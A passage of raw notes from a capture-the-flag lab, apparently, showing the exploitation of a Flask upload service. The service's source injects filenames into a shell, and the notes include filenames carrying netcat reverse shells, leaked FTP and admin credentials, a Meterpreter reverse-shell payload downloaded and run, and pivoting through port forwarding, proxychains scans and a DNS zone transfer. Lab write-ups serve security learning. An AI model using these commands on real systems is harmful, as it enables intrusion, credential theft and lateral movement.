<p class="mb-5">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Mollitia neque assumenda ipsam nihil, molestias magnam, recusandae quos quis inventore quisquam velit asperiores, vitae? Reprehenderit soluta, eos quod consequuntur itaque. Nam.</p>
<button class="btn btn-primary" href="#" data-dismiss="modal">
<i class="fas fa-times fa-fw"></i>
Close Window
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Bootstrap core JavaScript -->
<script src="static/js/000048jquery.min.js"></script>
<script src="static/js/000042bootstrap.bundle.min.js"></script>
<!-- Plugin JavaScript -->
<script src="static/js/000037jquery.easing.min.js"></script>
<!-- Contact Form JavaScript -->
<script src="static/js/000011jqBootstrapValidation.js"></script>
<script src="static/js/000012contact_me.js"></script>
<!-- Custom scripts for this template -->
<script src="static/js/000014freelancer.min.js"></script>
</body>
bash-4.4$ cat prestart.sh
cat prestart.sh
#! /usr/bin/env sh
echo "Running inside /app/prestart.sh, you could add migrations to this file, e.g.:"
echo "
#! /usr/bin/env bash
# Let the DB start
sleep 10;
# Run migrations
alembic upgrade head
"
bash-4.4$ cat supervisord.pid
cat supervisord.pid
1
bash-4.4$ cat debug
cat debug
!#/bin/bash
export FLASK_APP=main.py
export DEBUG=1
flask run --host=0.0.0.0 --port=80
bash-4.4$ cat my-form.html
cat my-form.html
<!DOCTYPE html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<!-- Custom fonts for this theme -->
<link href="static/css/000058all.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet"
type="text/css">
<!-- Theme CSS -->
<link href="static/css/000010freelancer.min.css" rel="stylesheet">
<title>upload</title>
</head>
<html lang="en">
<!-- Navigation -->
<nav class="navbar navbar-expand-lg bg-secondary text-uppercase fixed-top" id="mainNav">
<div class="container">
<a class="navbar-brand js-scroll-trigger" href="#page-top">Tempus Fugit Durius</a>
<button class="navbar-toggler navbar-toggler-right text-uppercase font-weight-bold bg-primary text-white rounded"
type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false"
aria-label="Toggle navigation">
Menu
<i class="fas fa-bars"></i>
</button>
<div class="collapse navbar-collapse" id="navbarResponsive">
<ul class="navbar-nav ml-auto">
<li class="nav-item mx-0 mx-lg-1">
<a class="nav-link py-3 px-0 px-lg-3 rounded js-scroll-trigger" href="{{ url_for('home') }}">Back</a>
</li>
</ul>
</div>
</div>
</nav>
<body bgcolor='#28a745'>
<header class="masthead bg-primary text-white text-center">
<div class=container d-flex align-items-center flex-column>
<center><h1>Upload script</h1>
<form action="/upload" method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="my-form" value="Upload !">
</form></center>
</div>
</header>
<p>
<div data-gb-custom-block data-tag="with">
<div data-gb-custom-block data-tag="if">
<ul class=flashes>
<div data-gb-custom-block data-tag="for">
<li>{{ message }}</li>
</div>
</ul>
</div>
</div>
</p>
</body>
</html>
bash-4.4$ cd upload
cd upload
bash-4.4$ ls
ls
a.txt;nc 168301415 -e sh a.txt;nc 168301415 443 -e ssh
a.txt;nc 168301415 443 -e sh test.txt;nc 168301415 -e bash
bash-4.4$ cat main.cpython-36.pyc
or uploading�zThat filename was way too long!zcat r T)r
zutf-8z�File successfully uploadedz
ftp.mofo.pwnsomeud
bash-4.4$ cat uwsgi.ini
cat uwsgi.ini
[uwsgi]
module = main
callable = app
uid=www
gid=www
bash-4.4$ cat main.py
cat main.py
import os
import urllib.request
from flask import Flask, flash, request, redirect, render_template
from ftplib import FTP
import subprocess
UPLOAD_FOLDER = 'upload'
ALLOWED_EXTENSIONS = {'txt', 'rtf'}
app = Flask(__name__)
app.secret_key = "mofosecret"
app.config['MAX_CONTENT_LENGTH'] = 2 * 1024 * 1024
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
cmd = 'fortune'
result = subprocess.check_output(cmd, shell=True)
return "<h1>400 - Sorry. I didn't find what you where looking for.</h1> <h2>Maybe this will cheer you up:</h2><h3>"+result.decode("utf-8")+"</h3>"
@app.errorhandler(500)
def internal_error(error):
return "<h1>500?! - What are you trying to do here?!</h1>"
@app.route('/')
def home():
return render_template('index.html')
@app.route('/upload')
def upload_form():
try:
return render_template('my-form.html')
except Exception as e:
return render_template("500.html", error = str(e))
def allowed_file(filename):
check = filename.rsplit('.', 1)[1].lower()
check = check[:3] in ALLOWED_EXTENSIONS
return check
def filtering(filename):
filtered = filename.replace("#","")
return filtered
@app.route('/upload', methods=['POST'])
def upload_file():
if request.method == 'POST':
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
if file.filename == '':
flash('No file selected for uploading')
return redirect(request.url)
if len(file.filename) > 30:
flash('That filename was way too long!')
return redirect(request.url)
if file.filename and allowed_file(file.filename):
filename = file.filename
filename = filtering(filename)
file.save(os.path.join(UPLOAD_FOLDER, filename))
cmd="cat "+UPLOAD_FOLDER+"/"+filename
result = subprocess.check_output(cmd, shell=True)
flash(result.decode("utf-8"))
flash('File successfully uploaded')
try:
ftp = FTP('ftp.mofo.pwn')
ftp.login('someuser', '04653cr37Passw0rdK06')
with open(UPLOAD_FOLDER+"/"+filename, 'rb') as f:
ftp.storlines('STOR %s' % filename, f)
ftp.quit()
os.remove(UPLOAD_FOLDER+"/"+filename)
except:
flash("Cannot connect to FTP-server")
return redirect('/upload')
else:
flash('Allowed file types are txt and rtf')
return redirect(request.url)
if __name__ == "__main__":
app.run()
ftp = FTP('ftp.mofo.pwn')
ftp.login('someuser', '04653cr37Passw0rdK06')
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ ftp 10.10.238.9
ftp: Can't connect to `10.10.238.9:21': Connection refused
ftp: Can't connect to `10.10.238.9:ftp'
bash-4.4$ ftp 10.10.238.9
ftp 10.10.238.9
bash: ftp: command not found
using python
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ cat ftp.py
#!/usr/bin/python
from ftplib import FTP
ftp = FTP()
ftp.connect("ftp.mofo.pwn", 21)
ftp.login("someuser", "04653cr37Passw0rdK06")
ftp.retrlines("LIST",lambda line: print(line))
ftp.quit()
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.238.9 - - [26/Jan/2023 13:39:16] "GET /ftp.py HTTP/1.1" 200 -
bash-4.4$ wget http://10.8.19.103:8000/ftp.py
wget http://10.8.19.103:8000/ftp.py
Connecting to 10.8.19.103:8000 (10.8.19.103:8000)
ftp.py 100% |*******************************| 187 0:00:00 ETA
bash-4.4$ python3 ftp.py
python3 ftp.py
-rw------- 1 ftp ftp 2 Jan 26 18:06 a.txt
-rw------- 1 ftp ftp 24 Apr 22 2020 creds.txt
-rw------- 1 ftp ftp 26 Jan 26 17:50 file.txt;id
-rw------- 1 ftp ftp 4 Jan 26 17:51 test.txt
-rw------- 1 ftp ftp 4 Jan 26 17:52 test.txt;id
-rw------- 1 ftp ftp 13 Jan 26 17:54 test2.txt
thanks chatGPT
Para realizar un login FTP con Python, se puede utilizar la biblioteca ftplib que proporciona Python.
Se utiliza el método "connect" para conectarse al servidor ftp.mofo.pwn en el puerto 21, que es el puerto predeterminado para FTP.
Luego, se utiliza el método "login" para iniciar sesión en el servidor con el nombre de usuario y contraseña proporcionados.
El método "retrlines" de la biblioteca ftplib de Python se utiliza para recibir líneas de texto desde el servidor FTP.
La lista devuelta se pasa a una función lambda que imprime cada línea recibida. Finalmente, se utiliza el método "quit" para cerrar la conexión con el servidor.
with open("creds.txt", "wb") as local_file:
ftp.retrbinary("RETR creds.txt", local_file.write)
En este ejemplo, se abre un archivo "creds.txt" en modo binario (wb) y se almacena en una variable "local_file". Luego se utiliza el método "retrbinary" para descargar el archivo "creds.txt" del servidor. El primer argumento es "RETR creds.txt" que indica al servidor que queremos descargar el archivo "creds.txt", y el segundo argumento es "local_file.write" que indica dónde se debe guardar el archivo descargado.
finally
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ cat ftp.py
#!/usr/bin/python
from ftplib import FTP
ftp = FTP()
ftp.connect("ftp.mofo.pwn", 21)
ftp.login("someuser", "04653cr37Passw0rdK06")
ftp.retrlines("LIST",lambda line: print(line))
with open("creds.txt", "wb") as local_file:
ftp.retrbinary("RETR creds.txt", local_file.write)
ftp.quit()
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.219.88 - - [26/Jan/2023 13:57:48] "GET /ftp.py HTTP/1.1" 200 -
ash-4.4$ wget http://10.8.19.103:8000/ftp.py
wget http://10.8.19.103:8000/ftp.py
Connecting to 10.8.19.103:8000 (10.8.19.103:8000)
ftp.py 100% |*******************************| 290 0:00:00 ETA
bash-4.4$ python3 ftp.py
python3 ftp.py
-rw------- 1 ftp ftp 24 Apr 22 2020 creds.txt
bash-4.4$ cat creds.txt
cat creds.txt
admin:BAraTuwwWzx3gG
possible admin panel login credentials.
cd /home
bash-4.4$ ls
ls
www
bash-4.4$ cd www
cd www
bash-4.4$ ls
ls
bash-4.4$ ls -lah
ls -lah
total 8
drwxr-sr-x 2 www www 4.0K Apr 22 2020 .
drwxr-xr-x 3 root root 4.0K Apr 22 2020 ..
bash-4.4$ ls -lah
ls -lah
total 76
drwxr-xr-x 146 root root 4.0K Apr 22 2020 .
drwxr-xr-x 146 root root 4.0K Apr 22 2020 ..
-rwxr-xr-x 1 root root 0 Apr 22 2020 .dockerenv
drwxr-xr-x 28 www www 4.0K Jan 26 18:57 app
drwxr-xr-x 2 root root 4.0K Aug 8 2019 bin
drwxr-xr-x 5 root root 360 Jan 26 18:44 dev
-rwxr-xr-x 1 root root 1.8K May 17 2019 entrypoint.sh
drwxr-xr-x 55 root root 4.0K Apr 22 2020 etc
drwxr-xr-x 3 root root 4.0K Apr 22 2020 home
drwxr-xr-x 16 root root 4.0K Apr 22 2020 lib
drwxr-xr-x 5 root root 4.0K Jan 30 2019 media
drwxr-xr-x 2 root root 4.0K Jan 30 2019 mnt
dr-xr-xr-x 97 root root 0 Jan 26 18:44 proc
drwx------ 9 root root 4.0K Aug 16 2019 root
drwxr-xr-x 2 root root 4.0K Jan 26 18:44 run
drwxr-xr-x 2 root root 4.0K Aug 11 2019 sbin
drwxr-xr-x 2 root root 4.0K Jan 30 2019 srv
-rwxr-xr-x 1 root root 404 May 16 2019 start.sh
dr-xr-xr-x 13 root root 0 Jan 26 18:44 sys
drwxrwxrwt 2 root root 4.0K Jan 26 18:44 tmp
drwxr-xr-x 59 root root 4.0K Apr 22 2020 usr
-rwxr-xr-x 1 root root 2.9K May 16 2019 uwsgi-nginx-entrypoint.sh
drwxr-xr-x 40 root root 4.0K Apr 22 2020 var
we are in a docker container
.dockerenv
bash-4.4$ ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
9: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
link/ether 02:42:c0:a8:96:0a brd ff:ff:ff:ff:ff:ff
inet 192.168.150.10/24 brd 192.168.150.255 scope global eth0
valid_lft forever preferred_lft forever
bash-4.4$ netstat -anp
netstat -anp
netstat: showing only processes with your user ID
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.11:38865 0.0.0.0:* LISTEN -
tcp 0 0 192.168.150.10:34441 10.8.19.103:443 ESTABLISHED 18/sh
udp 0 0 127.0.0.11:44396 0.0.0.0:* -
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 14611 - /tmp/uwsgi.sock
unix 2 [ ACC ] STREAM LISTENING 14567 - /run/supervisord.sock.1
using metasploit
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.2.33-dev ]
+ -- --=[ 2275 exploits - 1192 auxiliary - 406 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.19.103
LHOST => 10.8.19.103
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.8.19.103:4444
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ msfvenom -p /linux/x86/meterpreter/reverse_tcp LHOST=10.8.19.103 LPORT=4444 -f elf > shell.elf
Error: invalid payload: /linux/x86/meterpr┌─┌┌┌┌┌┌─┌┌┌┌┌┌┌┌┌┌┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.8.19.103 LPORT=4444 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ ls
'a.txt;nc 168301415 443 -e sh' ftp.py shell.elf
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.36.116 - - [26/Jan/2023 16:49:59] "GET /shell.elf HTTP/1.1" 200 -
bash-4.4$ wget http://10.8.19.103:8000/shell.elf
wget http://10.8.19.103:8000/shell.elf
Connecting to 10.8.19.103:8000 (10.8.19.103:8000)
shell.elf 100% |*******************************| 207 0:00:00 ETA
bash-4.4$ chmod +x shell.elf
chmod +x shell.elf
bash-4.4$ ./shell.elf
./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.8.19.103:4444
[*] Sending stage (1017704 bytes) to 10.10.36.116
[*] Meterpreter session 1 opened (10.8.19.103:4444 -> 10.10.36.116:38760) at 2023-01-26 16:50:27 -0500
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 9
============
Name : eth0
Hardware MAC : 02:42:c0:a8:96:0a
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.150.10
IPv4 Netmask : 255.255.255.0
What we can see here is, there is another host up located in **Interface 9** with IP address **“192.168.150.10”**. At this point, we need to escape from this container and access to the host located on **Interface 9**. In order to do that, we need to do **port forwarding**
El reenvío de puertos es una técnica utilizada para redirigir el tráfico de red desde un puerto específico de un dispositivo de red, como un router, a otro dispositivo en la red. Esto se utiliza a menudo para permitir que los dispositivos en una red privada, como una computadora personal o un servidor, sean accesibles desde Internet.
Un ejemplo común de uso de reenvío de puertos es configurar un servidor web en su red privada para que pueda ser accedido desde Internet. Sin el reenvío de puertos, los visitantes de su sitio web solo podrían acceder a él si estuvieran en su red privada. Sin embargo, configurando el reenvío de puertos en su router para redirigir el tráfico del puerto 80 (el puerto utilizado por defecto para el protocolo HTTP) a su servidor web, los visitantes de su sitio web podrán acceder a él desde cualquier lugar.
Un ejemplo concreto sería, si tienes un servidor web en tu red privada con la dirección IP 192.168.1.100 y quieres que los visitantes de Internet puedan acceder a él a través del puerto 80. Entonces, configurarías el reenvío de puertos en tu router para redirigir todo el tráfico entrante al puerto 80 a la dirección IP 192.168.1.100. De esta manera, cuando alguien escriba tu dirección IP pública en su navegador y acceda al puerto 80, su tráfico será redirigido al servidor web en tu red privada.
Una de las funciones de Meterpreter es el reenvío de puertos (port forwarding). Esto permite a un atacante redirigir el tráfico desde un puerto específico en un sistema comprometido a otro sistema en la red.
Para utilizar la función de reenvío de puertos de Meterpreter, primero debes obtener acceso a un sistema comprometido utilizando una de las muchas técnicas de explotación disponibles en Metasploit. Una vez que se ha obtenido acceso, se puede utilizar el comando "portfwd" para establecer una regla de reenvío de puertos.
Un ejemplo de uso sería:
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.100
En este ejemplo, se establece una regla para redirigir todo el tráfico entrante al puerto 3389 (el puerto utilizado para conectarse a un sistema Windows mediante RDP) al sistema con la dirección IP 192.168.1.100 en la red interna.
meterpreter > portfwd add -l 8888 -p 80 -r 192.168.150.10
[*] Forward TCP relay created: (local) :8888 -> (remote) 192.168.150.10:80
http://localhost:8888/ (Tempus Fugit Durius)
At this point, we need to discover other hosts on **“192.168.150.0/24”** **subnet.**
"meterpreter run autoroute" es un comando de Meterpreter que se utiliza para automatizar la configuración de una ruta de red en un sistema comprometido. Este comando utiliza la herramienta "route" para establecer una ruta para una subred específica a través de un gateway específico, lo que permite a un atacante acceder a sistemas y redes adicionales una vez que se ha comprometido un sistema inicial.
El flag "-p" es para indicar que se quiere hacer una ruta persistente, es decir que se mantendra activa después de un reinicio del sistema.
Ejemplo:
meterpreter > run autoroute -s 192.168.1.0/24 -n 192.168.1.1 -p
En este ejemplo, se establece una ruta para la subred 192.168.1.0/24 a través del gateway 192.168.1.1. Y se establece como persistente.
meterpreter > search -f resolv.conf
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/etc/resolv.conf 54 2023-01-26 15:59:24 -0500
meterpreter > cat /etc/resolv.conf
search mofo.pwn
nameserver 127.0.0.11
options ndots:0
meterpreter > background
https://infinitelogins.com/2021/02/20/using-metasploit-routing-and-proxychains-for-pivoting/
msf6 post(multi/manage/autoroute) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux www @ 192.168.150.10 10.8.19.103:4444 -> 10.10.36.116:38988 (192.168.150.10)
2 meterpreter x86/linux www @ 192.168.150.10 10.8.19.103:4444 -> 10.10.36.116:38989 (192.168.150.10)
msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, def
ault)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION yes The session to run this module on
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
View the full module info with the info, or info -d command.
msf6 post(multi/manage/autoroute) > set SUBNET 102.168.150.0/24
SUBNET => 102.168.150.0/24
msf6 post(multi/manage/autoroute) > set SESSION 2
SESSION => 2
msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, de
fault)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION 2 yes The session to run this module on
SUBNET 102.168.150.0/24 no Subnet (IPv4, for example, 10.10.10.0)
View the full module info with the info, or info -d command.
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 192.168.150.10
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.150.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.150.0 255.255.255.0 Session 2
[*] There are currently no IPv6 routes defined.
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ tail /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an addres
s on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an addres
s on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 9050 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ sudo proxychains nmap -n -sT -Pn -p 22,80 192.168.150.0/24
[sudo] password for kali:
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-26 17:56 EST
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.1:80 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.4:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.7:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.10:80 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.11:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.14:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.17:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.20:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.23:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.26:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.29:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.32:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.35:80 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.38:80
Found
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.150.1:80 ... OK
now portforwarding
meterpreter > portfwd add -l 8888 -p 80 -r 192.168.150.1
[*] Forward TCP relay created: (local) :8888 -> (remote) 192.168.150.1:80
http://localhost:8888/ (More Focus)
https://www.howtouselinux.com/post/dns-port
dig axfr mofo.pwn
This appears to be a command to perform a zone transfer (AXFR) of a DNS zone using the dig (Domain Information Groper) tool. The domain specified is "mofo.pwn," which may be a placeholder for a real domain. However, I would like to remind you that unauthorized access to someone else's DNS zone is considered illegal, and please refrain from any illegal activities.
AXFR (Full Zone Transfer) es un protocolo de DNS que permite a un servidor de DNS secundario obtener una copia completa de una zona de DNS de un servidor primario autorizado. Esto se utiliza para mantener la consistencia de la información de DNS entre los servidores primario y secundario. Sin embargo, es importante tener en cuenta que los servidores de DNS deben estar configurados correctamente para permitir las transferencias de zona y sólo los servidores de DNS autorizados deben tener acceso a ellas.
meterpreter > shell
Process 28 created.
Channel 11 created.
dig axfr mofo.pwn
; <<>> DiG 9.11.8 <<>> axfr mofo.pwn
;; global options: +cmd
mofo.pwn. 14400 IN SOA ns1.mofo.pwn. admin.mofo.pwn. 14 7200 120 2419200 604800
mofo.pwn. 14400 IN TXT "v=spf1 ip4:176.23.46.22 a mx ~all"
mofo.pwn. 14400 IN NS ns1.mofo.pwn.
durius.mofo.pwn. 14400 IN A 192.168.150.1
ftp.mofo.pwn. 14400 IN CNAME punk.mofo.pwn.
gary.mofo.pwn. 14400 IN A 192.168.150.15
geek.mofo.pwn. 14400 IN A 192.168.150.14
kfc.mofo.pwn. 14400 IN A 192.168.150.17
leet.mofo.pwn. 14400 IN A 192.168.150.13
mail.mofo.pwn. 14400 IN TXT "v=spf1 a -all"
mail.mofo.pwn. 14400 IN A 192.168.150.11
milo.mofo.pwn. 14400 IN A 192.168.150.16
newcms.mofo.pwn. 14400 IN CNAME durius.mofo.pwn.
ns1.mofo.pwn. 14400 IN A 192.168.150.100
punk.mofo.pwn. 14400 IN A 192.168.150.12
sid.mofo.pwn. 14400 IN A 192.168.150.10
www.mofo.pwn. 14400 IN CNAME sid.mofo.pwn.
mofo.pwn. 14400 IN SOA ns1.mofo.pwn. admin.mofo.pwn. 14 7200 120 2419200 604800
;; Query time: 2 msec
;; SERVER: 127.0.0.11#53(127.0.0.11)
;; WHEN: Thu Jan 26 23:13:48 UTC 2023
;; XFR size: 18 records (messages 1, bytes 467)
newcms.mofo.pwn. 14400 IN CNAME durius.mofo.pwn.
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ sudo nano /etc/hosts
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ tail /etc/hosts
10.10.148.212 fire.windcorp.thm
10.10.85.102 selfservice.windcorp.thm
10.10.85.102 selfservice.dev.windcorp.thm
10.10.167.117 team.thm
10.10.167.117 dev.team.thm
10.10.29.100 set.windcorp.thm
10.10.20.190 Osiris.windcorp.thm Osiris osiris.windcorp.thm
10.10.37.31 UNATCO
10.10.73.143 jack.thm
127.0.0.1 newcms.mofo.pwn
http://newcms.mofo.pwn:8888/
──(kali㉿kali)-[~/Downloads/time_flies]
└─$ feroxbuster -t 60 -u http://newcms.mofo.pwn:8888/ -k -w /usr/share/wordlists/dirb/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://newcms.mofo.pwn:8888/
🚀 Threads │ 60
📖 Wordlist │ /usr/share/wordlists/dirb/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[>-------------------] - 1s 1/4614 1h found:0 errors:0
[>-------------------] - 2s 2/4614 1h found:0 errors:0
[>-------------------] - 3s 3/4614 1h found:0 errors:0
